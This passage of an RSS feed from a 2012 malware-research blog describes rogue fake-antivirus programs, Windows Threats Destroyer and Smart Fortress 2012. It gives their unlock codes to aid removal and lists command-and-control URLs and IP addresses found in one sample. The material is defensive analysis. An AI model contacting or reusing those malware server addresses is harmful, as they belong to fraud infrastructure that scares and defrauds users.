imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-T7PTkCw5Z50/T1ZiXyJs9SI/AAAAAAAAFYo/dx5S3ylMA9g/s400/dumpedunpack.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-H_aXiOq98wA/T1ZiCkYksLI/AAAAAAAAFYY/iMtnQ4pl0a0/s1600/antireverse.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-H_aXiOq98wA/T1ZiCkYksLI/AAAAAAAAFYY/iMtnQ4pl0a0/s400/antireverse.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-iDHRsuk1zJk/T1ZiH667INI/AAAAAAAAFYg/BoX-ZrqnRX4/s1600/serial.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="137" src="http://3.bp.blogspot.com/-iDHRsuk1zJk/T1ZiH667INI/AAAAAAAAFYg/BoX-ZrqnRX4/s400/serial.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-7437171989227520853?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/antimalware-pc-safety.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-ZmE6WGiNCxo/T1ZPdMA6HkI/AAAAAAAAFX4/x2TuLO8GupQ/s72-c/iconnz.PNG" height="72" width="72" /><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8007255907166518710</guid><pubDate>Thu, 01 Mar 2012 22:31:00 +0000</pubDate><atom:updated>2012-03-01T23:37:21.496+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tritax</category><category domain="http://www.blogger.com/atom/ns#">Windows Threats Destroyer</category><title>Windows Threats Destroyer</title><description>&lt;img border="0" src="http://4.bp.blogspot.com/-v-1GPqrjnXc/T0_6FJUeqrI/AAAAAAAAFVg/vJea3ZqWxVU/s1600/iconz.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Windows Threats Destroyer&lt;/b&gt; is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces &lt;b&gt;Windows Firewall Constructor&lt;/b&gt;, &lt;b&gt;Windows Stability Guard&lt;/b&gt;, &lt;b&gt;Windows Basic Antivirus&lt;/b&gt;, &lt;b&gt;Windows PRO Scanner&lt;/b&gt;, &lt;b&gt;Windows Shield Tool&lt;/b&gt;, &lt;b&gt;Windows Telemetry Center&lt;/b&gt;, &lt;b&gt;Windows Performance Catalyst&lt;/b&gt;, &lt;b&gt;Windows Smart Partner&lt;/b&gt;, &lt;b&gt;Windows Smart Warden&lt;/b&gt;, &lt;b&gt;Windows Functionality Checker&lt;/b&gt;, &lt;b&gt;Windows Protection Master&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This rogue is from the same familly as &lt;a href="http://siri-urz.blogspot.com/search/label/Tritax"&gt;Tritax&lt;/a&gt;, same paker (ASProtect) and same lame shit.&lt;br /&gt;Now they just try to imitate 'Security Master AV' GUI, or maybe based on the same code..&amp;nbsp; (i've not the sample anymore)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-aSkGgGBBSIs/T0_vF6JTZWI/AAAAAAAAFVA/2tfeMdQYJnc/s1600/splash.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://3.bp.blogspot.com/-aSkGgGBBSIs/T0_vF6JTZWI/AAAAAAAAFVA/2tfeMdQYJnc/s400/splash.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-HKHnuFznpzs/T0_u8NYDqcI/AAAAAAAAFU4/mFEIXeBYNDk/s1600/Windows.Threats.Destroyer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="290" src="http://4.bp.blogspot.com/-HKHnuFznpzs/T0_u8NYDqcI/AAAAAAAAFU4/mFEIXeBYNDk/s400/Windows.Threats.Destroyer.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;To register (and help removal), copy paste this code: &lt;b style="color: red;"&gt;0W000-000B0-00T00-E0020&lt;/b&gt;&lt;br /&gt;'0' can be anything, and '2' can be replaced by '1', '2' or '3'&lt;br /&gt;Sorry, no keygen, no kitten.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-TPVpDkCtWXY/T0_yAr2BZ6I/AAAAAAAAFVQ/o06Zq2NE6zU/s1600/routine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-TPVpDkCtWXY/T0_yAr2BZ6I/AAAAAAAAFVQ/o06Zq2NE6zU/s400/routine.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-5IaDCSrvmKY/T0_4dGN2f1I/AAAAAAAAFVY/j0w_vQ7Yeeo/s1600/1330593870374.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://4.bp.blogspot.com/-5IaDCSrvmKY/T0_4dGN2f1I/AAAAAAAAFVY/j0w_vQ7Yeeo/s640/1330593870374.jpg" width="376" /&gt;&lt;/a&gt;&lt;/div&gt;Merci siri et Baboon :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8007255907166518710?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/windows-threats-destroyer.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-v-1GPqrjnXc/T0_6FJUeqrI/AAAAAAAAFVg/vJea3ZqWxVU/s72-c/iconz.PNG" height="72" width="72" /><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3009745734265185287</guid><pubDate>Wed, 29 Feb 2012 10:02:00 +0000</pubDate><atom:updated>2012-02-29T11:07:18.812+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Smart Fortress 2012</category><category domain="http://www.blogger.com/atom/ns#">fakeav</category><category domain="http://www.blogger.com/atom/ns#">bestAV</category><title>Smart Fortress 2012</title><description>&lt;img border="0" src="http://2.bp.blogspot.com/-O38_WvP1uj0/T03135dZdmI/AAAAAAAAFUg/cr_0DgwwRK4/s1600/icons.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;Accortding to &lt;a href="http://siri-urz.blogspot.com/"&gt;S!Ri&lt;/a&gt;, &lt;b&gt;Smart Fortress 2012&lt;/b&gt; is a fake anti-spyware tool. It displays fake alert messages, prevent execution of legit programs and detects inexistent infections to scare users.&lt;br /&gt;It is a clone of &lt;b&gt;Smart Protection 2012&lt;/b&gt;, &lt;b&gt;Personal Shield Pro&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-y33_uhlDRQA/T031Ix2K1TI/AAAAAAAAFUQ/VSA-V5FczMQ/s1600/Smart.Fortress.2012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://3.bp.blogspot.com/-y33_uhlDRQA/T031Ix2K1TI/AAAAAAAAFUQ/VSA-V5FczMQ/s400/Smart.Fortress.2012.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;To register (and help removal), copy paste this code: &lt;b style="color: red;"&gt;AA39754E-715219CE&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-afYN4UdxJ0I/T031cVEOBoI/AAAAAAAAFUY/oJvEDPARP1Q/s1600/29-02-2012+10-45-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="105" src="http://3.bp.blogspot.com/-afYN4UdxJ0I/T031cVEOBoI/AAAAAAAAFUY/oJvEDPARP1Q/s400/29-02-2012+10-45-07.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The following urls were found: &lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://78.159.105.142/api/stats/install/?&amp;amp;affid=46701&amp;amp;ver=3030002&amp;amp;group=sp&lt;br /&gt;http://95.168.172.86/p/?&amp;amp;aid=test&amp;amp;lid=3030002&amp;amp;affid=46701&amp;amp;nid=9025E786&amp;amp;group=sf&lt;br /&gt;http://95.168.172.86/p/gr/?lid=3030002&amp;amp;group=sf&amp;amp;nid=9025E786&amp;amp;s=3&amp;amp;affid=46701&amp;amp;aid=test&lt;/div&gt;&lt;br /&gt;95.168.172.86 was also used by &lt;a href="http://xylibox.blogspot.com/2012/02/win32rovnix.html"&gt;Win32/Rovnix&lt;/a&gt;&lt;br /&gt;&amp;nbsp;Here, one again serving FakeAV:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-83p1zRN1pyg/T034taXyTcI/AAAAAAAAFUw/FgamoTOwAtw/s1600/29-02-2012+11-05-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-83p1zRN1pyg/T034taXyTcI/AAAAAAAAFUw/FgamoTOwAtw/s400/29-02-2012+11-05-53.png" width="387" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Also on my star-stat.com post, someone have do a weird comment claiming to have the source code of this type of FakeAV.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ydvG5WZlB_g/T033Xj_m1RI/AAAAAAAAFUo/7g1WOhAMXfo/s1600/68968570.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-ydvG5WZlB_g/T033Xj_m1RI/AAAAAAAAFUo/7g1WOhAMXfo/s400/68968570.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3009745734265185287?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/02/smart-fortress-2012.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-O38_WvP1uj0/T03135dZdmI/AAAAAAAAFUg/cr_0DgwwRK4/s72-c/icons.PNG" height="72" width="72" /><thr:total>1</thr:total></item></channel></rss>

